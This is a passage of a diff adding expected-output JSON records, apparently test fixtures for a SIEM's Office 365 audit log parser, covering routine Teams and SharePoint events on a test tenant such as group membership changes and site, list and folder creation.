"user.name": "root" + }, + { + "@timestamp": "2021-02-05T09:07:58.000Z", + "event.action": "added-users-to-group", + "event.category": "iam", + "event.code": "MicrosoftTeams", + "event.dataset": "o365.audit", + "event.id": "f16cc0cc-2a18-580e-83c5-04d3c385ebb8", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "MicrosoftTeams", + "event.type": [ + "group", + "change" + ], + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 18695, + "o365.audit.AADGroupId": "61b6d6f5-7aa0-437b-a967-fbcd39ec90a1", + "o365.audit.CommunicationType": "Team", + "o365.audit.CreationTime": "2021-02-05T09:07:58", + "o365.audit.Id": "f16cc0cc-2a18-580e-83c5-04d3c385ebb8", + "o365.audit.ItemName": "users", + "o365.audit.Members": [ + { + "DisplayName": "Adrian Serrano", + "Role": 2, + "UPN": "admin@testsiem4.onmicrosoft.com" + }, + { + "DisplayName": "Eve", + "Role": 2, + "UPN": "eve@testsiem4.onmicrosoft.com" + } + ], + "o365.audit.Operation": "MemberAdded", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 25, + "o365.audit.TeamGuid": "19:5b5e23f8af084c2188311d38cd51ac0f@thread.tacv2", + "o365.audit.TeamName": "users", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "21119711-1517-43d4-8138-b537dafad016", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "MicrosoftTeams", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": [ + "admin@testsiem4.onmicrosoft.com", + "eve@testsiem4.onmicrosoft.com", + "root" + ], + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root" + }, + { + "@timestamp": "2021-02-05T09:08:13.000Z", + "client.address": "52.114.88.180", + "client.ip": "52.114.88.180", + "event.action": "ListColumnUpdated", + "event.category": "web", + "event.code": "SharePointFieldOperation", + "event.dataset": "o365.audit", + "event.id": "6454a7d9-afae-4a6c-ffa5-08d8c9b5911c", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 19362, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", + "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", + "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.CorrelationId": "fc39a89f-5054-2000-9ced-83aa1cf560fd", + "o365.audit.CreationTime": "2021-02-05T09:08:13", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "6454a7d9-afae-4a6c-ffa5-08d8c9b5911c", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 1, + "o365.audit.ItemType": "Field", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListTitle": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/66afcf95-7cd2-4b68-a3e8-3383d908b8f2/28cf69c5-fa48-462a-b5cd-27b6f9d2bd5f", + "o365.audit.Operation": "ListColumnUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 56, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "SkypeSpaces/1.0a$*+", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "i:0h.f|membership|1003200112eb07e6@live.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "52.114.88.180", + "related.user": "root", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "52.114.88.180", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "SkypeSpaces/1.0a$*+" + }, + { + "@timestamp": "2021-02-05T09:08:12.000Z", + "client.address": "52.114.88.180", + "client.ip": "52.114.88.180", + "event.action": "FolderCreated", + "event.category": "file", + "event.code": "SharePointFileOperation", + "event.dataset": "o365.audit", + "event.id": "6d69552c-2019-4f7c-92bc-08d8c9b5908b", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "creation", + "file.directory": "Shared Documents", + "file.extension": "", + "file.name": "General", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 20481, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", + "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", + "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.CorrelationId": "fc39a89f-b01b-2000-9ced-879789d2d8e5", + "o365.audit.CreationTime": "2021-02-05T09:08:12", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "6d69552c-2019-4f7c-92bc-08d8c9b5908b", + "o365.audit.ItemType": "Folder", + "o365.audit.ListId": "66afcf95-7cd2-4b68-a3e8-3383d908b8f2", + "o365.audit.ListItemUniqueId": "81d4cd08-7ffb-45d2-a422-86a9a9335d66", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/Shared Documents/General", + "o365.audit.Operation": "FolderCreated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 6, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users/", + "o365.audit.SourceFileExtension": "", + "o365.audit.SourceFileName": "General", + "o365.audit.SourceRelativeUrl": "Shared Documents", + "o365.audit.UserAgent": "SkypeSpaces/1.0a$*+", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "i:0h.f|membership|1003200112eb07e6@live.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "52.114.88.180", + "related.user": "root", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "52.114.88.180", + "tags": [ + "forwarded" + ], + "url.original": "https://testsiem4.sharepoint.com/sites/users/Shared Documents/General", + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "SkypeSpaces/1.0a$*+" + }, + { + "@timestamp": "2021-02-05T09:07:57.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "6e9fc7e0-158a-4456-2a89-08d8c9b58771", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 21523, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:57", + "o365.audit.EventData": "Site Members", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "6e9fc7e0-158a-4456-2a89-08d8c9b58771", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "Everyone except external users", + "o365.audit.TargetUserOrGroupType": "SecurityGroup", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "a9b8277d-d3b9-4d99-0491-08d8c9b5874b", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 22335, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "a9b8277d-d3b9-4d99-0491-08d8c9b5874b", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "SHAREPOINT\\system", + "o365.audit.TargetUserOrGroupType": "Member", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "dfef0880-e895-47e1-2e39-08d8c9b58733", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 23127, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "dfef0880-e895-47e1-2e39-08d8c9b58733", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "users Owners", + "o365.audit.TargetUserOrGroupType": "SecurityGroup", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "d9b6f410-30c7-42a0-0820-08d8c9b5872c", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 23920, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Members", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "d9b6f410-30c7-42a0-0820-08d8c9b5872c", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "users Members", + "o365.audit.TargetUserOrGroupType": "SecurityGroup", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "5c82c14e-525e-44f4-7cd7-08d8c9b58722", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 24715, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "5c82c14e-525e-44f4-7cd7-08d8c9b58722", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "SHAREPOINT\\system", + "o365.audit.TargetUserOrGroupType": "Member", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "client.address": "20.190.143.50", + "client.ip": "20.190.143.50", + "event.action": "SiteCollectionCreated", + "event.category": "web", + "event.code": "SharePoint", + "event.dataset": "o365.audit", + "event.id": "f576a30e-1734-4f42-f3b3-08d8c9b58718", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 25507, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Graph", + "o365.audit.ApplicationId": "00000006-0000-0ff1-ce00-000000000000", + "o365.audit.ClientIP": "20.190.143.50", + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "O365AdminCenterTrueFalse", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "f576a30e-1734-4f42-f3b3-08d8c9b58718", + "o365.audit.ItemType": "Site", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "SiteCollectionCreated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 4, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "20.190.143.50", + "related.user": "app", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "20.190.143.50", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:56.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "f84f38b0-1963-4a1d-454e-08d8c9b586e9", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 26436, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:56", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "f84f38b0-1963-4a1d-454e-08d8c9b586e9", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "users Owners", + "o365.audit.TargetUserOrGroupType": "SecurityGroup", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:07:55.000Z", + "event.action": "AddedToGroup", + "event.category": "web", + "event.code": "SharePointSharingOperation", + "event.dataset": "o365.audit", + "event.id": "e85ec350-af23-47a7-5b33-08d8c9b586be", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "sharepoint", + "input.type": "log", + "log.offset": 27229, + "o365.audit.CorrelationId": "4eb429d5-cf62-4a12-a3f6-526628c81d78", + "o365.audit.CreationTime": "2021-02-05T09:07:55", + "o365.audit.EventData": "Site Owners", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "e85ec350-af23-47a7-5b33-08d8c9b586be", + "o365.audit.ItemType": "Web", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.Operation": "AddedToGroup", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 14, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.SiteUrl": "https://testsiem4.sharepoint.com/sites/users", + "o365.audit.TargetUserOrGroupName": "SHAREPOINT\\system", + "o365.audit.TargetUserOrGroupType": "Member", + "o365.audit.UserAgent": "", + "o365.audit.UserId": "app@sharepoint", + "o365.audit.UserKey": "i:0i.t|00000003-0000-0ff1-ce00-000000000000|app@sharepoint", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.user": "app", + "service.type": "o365", + "tags": [ + "forwarded" + ], + "user.domain": "sharepoint", + "user.email": "app@sharepoint", + "user.id": "app@sharepoint", + "user.name": "app", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "" + }, + { + "@timestamp": "2021-02-05T09:08:14.000Z", + "client.address": "52.114.88.180", + "client.ip": "52.114.88.180", + "event.action": "ListUpdated", + "event.category": "web", + "event.code": "SharePointListOperation", + "event.dataset": "o365.audit", + "event.id": "32474de1-fca7-4d81-4f97-08d8c9b591a4", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 28021, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", + "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", + "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.CorrelationId": "fc39a89f-4077-2000-7abb-cbd546e4157d", + "o365.audit.CreationTime": "2021-02-05T09:08:14", + "o365.audit.DoNotDistributeEvent": true, + "o365.audit.EventSource": "SharePoint", + "o365.audit.FromApp": false, + "o365.audit.Id": "32474de1-fca7-4d81-4f97-08d8c9b591a4", + "o365.audit.IsDocLib": true, + "o365.audit.ItemCount": 0, + "o365.audit.ItemType": "List", + "o365.audit.ListBaseTemplateType": "101", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListColor": "", + "o365.audit.ListIcon": "", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.Operation": "ListUpdated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 36, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.TemplateTypeId": "", + "o365.audit.UserAgent": "SkypeSpaces/1.0a$*+", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "i:0h.f|membership|1003200112eb07e6@live.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + "o365.audit.WebId": "3b387d63-522a-4745-bcc8-4107d92b8840", + "o365.audit.Workload": "SharePoint", + "organization.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "related.ip": "52.114.88.180", + "related.user": "root", + "service.type": "o365", + "source.as.number": 8075, + "source.as.organization.name": "Microsoft Corporation", + "source.geo.city_name": "London", + "source.geo.continent_name": "Europe", + "source.geo.country_iso_code": "GB", + "source.geo.country_name": "United Kingdom", + "source.geo.location.lat": 51.5132, + "source.geo.location.lon": -0.0961, + "source.geo.region_iso_code": "GB-ENG", + "source.geo.region_name": "England", + "source.ip": "52.114.88.180", + "tags": [ + "forwarded" + ], + "user.domain": "testsiem4.onmicrosoft.com", + "user.email": "root@testsiem4.onmicrosoft.com", + "user.id": "root@testsiem4.onmicrosoft.com", + "user.name": "root", + "user_agent.device.name": "Other", + "user_agent.name": "Other", + "user_agent.original": "SkypeSpaces/1.0a$*+" + }, + { + "@timestamp": "2021-02-05T09:08:14.000Z", + "client.address": "52.114.88.180", + "client.ip": "52.114.88.180", + "event.action": "ListCreated", + "event.category": "web", + "event.code": "SharePointListOperation", + "event.dataset": "o365.audit", + "event.id": "20b7fc96-6e31-437a-50fa-08d8c9b59185", + "event.kind": "event", + "event.module": "o365", + "event.outcome": "success", + "event.provider": "SharePoint", + "event.type": "info", + "fileset.name": "audit", + "host.id": "48622b8f-44d3-420c-b4a2-510c8165767e", + "host.name": "testsiem4.onmicrosoft.com", + "input.type": "log", + "log.offset": 29095, + "network.type": "ipv4", + "o365.audit.ApplicationDisplayName": "Microsoft Teams Services", + "o365.audit.ApplicationId": "cc15fd57-2c6c-4117-a88c-83b1d56b4bbe", + "o365.audit.ClientIP": "52.114.88.180", + "o365.audit.CorrelationId": "fc39a89f-4077-2000-7abb-cbd546e4157d", + "o365.audit.CreationTime": "2021-02-05T09:08:14", + "o365.audit.EventSource": "SharePoint", + "o365.audit.Id": "20b7fc96-6e31-437a-50fa-08d8c9b59185", + "o365.audit.ItemType": "List", + "o365.audit.ListBaseTemplateType": "DocumentLibrary", + "o365.audit.ListBaseType": "DocumentLibrary", + "o365.audit.ListId": "96cdfc22-2b86-49ea-b4e9-f11888b1665d", + "o365.audit.ListTitle": "96CDFC22-2B86-49EA-B4E9-F11888B1665D", + "o365.audit.ObjectId": "https://testsiem4.sharepoint.com/sites/users/SiteAssets", + "o365.audit.Operation": "ListCreated", + "o365.audit.OrganizationId": "48622b8f-44d3-420c-b4a2-510c8165767e", + "o365.audit.RecordType": 36, + "o365.audit.Site": "457ebd3e-0d71-454f-a4d4-2f552991d13c", + "o365.audit.UserAgent": "SkypeSpaces/1.0a$*+", + "o365.audit.UserId": "root@testsiem4.onmicrosoft.com", + "o365.audit.UserKey": "i:0h.f|membership|1003200112eb07e6@live.com", + "o365.audit.UserType": 0, + "o365.audit.Version": 1, + 